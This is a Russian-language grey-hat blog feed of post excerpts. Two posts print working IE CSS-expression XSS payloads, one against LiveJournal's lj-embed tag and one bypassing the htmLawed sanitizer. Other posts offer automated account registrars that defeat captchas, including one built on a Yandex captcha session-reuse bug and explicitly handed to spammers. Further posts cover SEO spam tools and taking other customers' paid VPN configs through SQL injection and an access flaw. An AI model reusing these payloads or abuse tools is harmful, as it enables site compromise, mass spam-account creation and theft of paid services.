стопицотпервый блог

Можно выполнить произвольный JS-код в теле поста в ЖЖ. Почему псевдо? Потому что код внедряется не совсем в тело письма. Дело в том, что у ЖЖ есть такой тег служебный – <lj-embed></lj-embed>. По всей видимости для вставки всякого мультимедийного контента (видео, аудио и др.). Но вставка кода происходит не напрямую в тело письма – код выполняется на другом домене (lj-toys.com), а непосредственно в тело поста/письма вставляется через iframe. Для такого контента по всей видимости используется то ли отдельный, то ли изменённый фильтр, в котором и присутствует брешь (подразумевается, что читающий в курсе, что нижеприведённый код является также и брешью IE).

Т.о. мы не получим доступа к личным данным пользователя (cookies и др.) , но тем не менее можем выполнить свой Javascript-сценарий.

Код:

<lj-embed>
<div style=’xek:\65\78\70\72\65\73\73\69\6F\6E(alert(7))’>1</div>
</lj-embed>

Итак, наконец блог снова ожил и в рамках ентого маленького но приятного события я палю метод как просмотреть фотку ВКонтакте закрытую ограничениями приватности.

Итак, метод:
Read more »

На очередном обсуждении безопасности (защита от XSS) в топике на хабре увидел комментарий с советом данного FREEWARE-продукта:

«Странно, никто не вспомнил про htmLawed, а ведь он, имхо, достаточно крутой соперник и джевиксу и саксу и инпутфильтру.«

Недолго думая я отыскал онлайн-демку данного редактора:
http://www.bioinformatics.org/phplabware/internal_utilities/htmLawed/htmLawedSafeModeTest.php

И минут за 15 была найдена рабочая активная XSS под IE:

<font color="xss;o:expression(alert('i_am_alive_=)'))" style="top:expression(alert('i_am_killed_=('))"></font>

Благополучно превращалось в:

<span style="top: (alert('i_am_killed_=(')); color: xss;o:expression(alert('i_am_alive_=)'));"> </span>

Замечу, что данный продукт предоставляется также в виде модуля к CMS Drupal (http://drupal.org/project/htmLawed).

XSS тестировалась при Default-настройке.

Автореггер аккаунтов в сервисах my.opera.com (один акк на все сервисы) через анти-капчу (AC-service.info).

[*] Написан на PHP, удобен, прост. Ничего лишнего.
[*] Для работы понадобится хостинг с PHP + cURL и аккаунт в системе anti-captcha (могу дать инвайт).
[*] Встроенная проверка настроек хостинга для оптимальной работы скрипта.

Скриншот: http://brainpillow.cc/screenshot4.jpg
Read more »

Автореггер ЖЖ-акков через сервис AC-service.info.

[*] Написан на PHP, удобен, прост. Ничего лишнего.
[*] Для работы понадобится хостинг с PHP + cURL и аккаунт в системе anti-captcha (могу дать инвайт).
[*] Встроенная проверка настроек хостинга для оптимальной работы скрипта.

Скриншот: http://brainpillow.cc/screenshot4.jpg
Read more »

Недавно на хабре промелькнул пост-предостережение PHP-программистов об одной частой ошибке. Речь идёт об использовании Captcha, которая обычно привязывается к сессии. После ввода правильной капчи сессия должна вытираться как использованная, однако не все об этом помнят и как результат можно один раз ввести правильно капчу и с одной и той же (так и не удалённой) сессией совершать защищённое капчей дествие снова и снова.

Собственно я решил проверить, действительно ли так распространён этот баг? Долго думать не пришлось и я замахнулся на одного из рунетовских гигантов – Яндекс. Результат приятно удивил во мне черношляпника и навёл грусть на патриота внутри меня – Яндекс страдал этой ошибкой. Применение этому было найдено уже давно – фтп от Яндекса давно используются для редиректов и я не раздумывая написал на PHP автоматический реггер мыл и фтп-аккаунтов.

В итоге я получил быстрый (более 300 акков за 10 минут на модемном соединении), не зависящий от сервисов распознования Captcha, реггер. Для спамера – смачный подарок, которым Бог мне велил поделиться.. Так что угощайтесь.
Read more »

Начинаю серию постов на тему «SEO для нищих». Смысл не в том, что это якобы не прибыльный бизнес, а в том, что эти серии будут полезны людям, которые в своём начинании SEO-бизнеса не имеют материальной поддержки в виде американских президентов (точнее цифр, отличных от нуля на электронном кошельке).

Итак, первая часть посвящена тому, как нахаляву прогнать по каталогам свой сайт. О полезности данной операции не хочу ничего говорить, потому что сказано уже много всяких противоречивых вещей. Одно могу сказать точно – аккуратный и «нежный» прогон не помешает
Read more »

Кликабельно

Иду я, значит иду себе, размышляю о бытии, а тут вдруг раз – и падает мне на голову СЕО-иструмент – рассылочник по социальным закладкам. Только я его вкинуть собрался, а он и говорит мне человеческим голосом:

- Не выкидывай меня, добрый молодец.
- Тьфу ты, простигосподи, а ты что за чудище?
- Я BMsubmitter последней (но всёравно, сука, старой) версии, я тебе ещё пригожусь!
- А чё ты умеешь?
- В базовый пакет входят модули для поста ссылок в следующие сайты: Delicious, Technorati.com(!), Connotea.org, Mister-wong.com, Furl.net, Bibsonomy.org, Spotback.com, A1-webmarks.com, Linkagogo.com, Upchuckr.com, Myvmarks.com, Simpy.com, Syncone.net, Givealink.org, Lycos IQ, iKeepBookmarks.com, Trucking Bookmarks, Memfrag.com, Folkd.com, Myhq.com. Все, кроме Del.icio.us, dofollow.
- Так это… на сайте ты вроде 52 бачинских стоишь.
- Я отдамся тебе нахаляву!

И стали мы жить-поживать да добра наживать.

Вообще проект давно не обновлялся, поэтому будем надеяться, что подобные акты подтолкнут автора доработать свой софт и пофиксить имеющиеся косяки (а их собственно хватает).

Линк на скачку: Read more »

Несколько месяцев назад наткнулся на очередной проект по предоставлению доступа к анонимным VPN в разных странах. Проект выглядел чинно: дизайн, регистрация клиентов, автоматическая оплата, выборка стран и среднестатистические цены (возможно даже чуть выше, чем у конкурентов). И всё бы ничего, но по роду своей деятельности ручки потянулись к тестированию этого проекта и результатом стал этот пост и видео по добыче «бесплатного» VPN от вышеупомянутой конторы.

Всего нашлось 2 баги:

1) Классическая Blind SQL-injection
2) Возможность беспрепятственно скачать чужие оплаченные настройки к VPN

Собственно процесс получения кошерного доступа через второй баг был снят на видео.
Read more »